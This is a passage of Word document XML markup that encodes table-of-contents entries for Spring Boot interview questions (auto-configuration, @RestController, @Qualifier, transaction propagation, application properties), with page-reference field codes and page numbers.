              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308044 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>743</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E6223A1" w14:textId="08158FA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4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Spring Boot? Why is it used?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308045 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>743</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="45FDD0A6" w14:textId="2CA037F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4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internal working of Spring Boot application?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308046 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>743</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="353A3F35" w14:textId="186960D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4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Spring and Spring Boot?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308047 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>745</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="169791FF" w14:textId="698F177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4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are the advantages of Spring Boot?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308048 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>746</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4FC8B0E3" w14:textId="4671352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4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role of @Controller and @RequestMapping?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308049 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>746</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6136D8B8" w14:textId="1E1D77E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5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a Spring Boot Starter?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308050 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>747</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1024E609" w14:textId="3ED1B6E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5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a yaml file in SpringBoot?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308051 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>748</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="72999CEA" w14:textId="0412EFA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5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application.properties or application.yml used for?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308052 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>749</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0A25BF50" w14:textId="0E99E2C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5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does Spring Boot auto-configuration work?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308053 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>750</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="65290EBE" w14:textId="0E3D317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5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do you create a RESTful API in Spring Boot?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308054 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>751</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="73276F14" w14:textId="5A062F6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5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do you connect Spring Boot with a database (JPA/Hibernate)?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308055 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>754</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4ADD4D39" w14:textId="1C89F9F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5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use of @Transient in spring boot?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308056 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>757</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="26E86065" w14:textId="00E3F12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5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are the types of transaction propagation?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308057 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>758</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3BC6D09E" w14:textId="019F079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5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Qualifier in spring? What is the use of @Qualifier?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308058 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>760</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="553E13A4" w14:textId="3BB9C91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5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create multiple modules using spring boot?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308059 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>761</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4984570A" w14:textId="0DF9F19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6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are all methods present in the controller?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308060 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>764</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="750BFA03" w14:textId="00E375F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6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annotations in Spring boot?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308061 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>766</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="67834E0F" w14:textId="550D47C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6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query parameter?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308062 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>769</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="335670CA" w14:textId="3AB17F9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6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change the server in Spring boot?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308063 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>770</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1631B8F9" w14:textId="7E3A616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6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Controller and @RestController?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308064 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>772</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0C91D5CB" w14:textId="49BB018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6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use of @Responsebody annotation?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308065 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>773</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="51C37C1A" w14:textId="3123B30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6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RestController annotation in Spring boot?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308066 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>773</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="537CC37E" w14:textId="1C444C2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6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ich two annotations are used in built by @RestController?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308067 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>775</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="74648EA3" w14:textId="084A5C8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6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access application.properties properties in java code?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308068 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>775</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="50C10990" w14:textId="06D0ABD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6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Spring boot application? How does it work?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308069 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
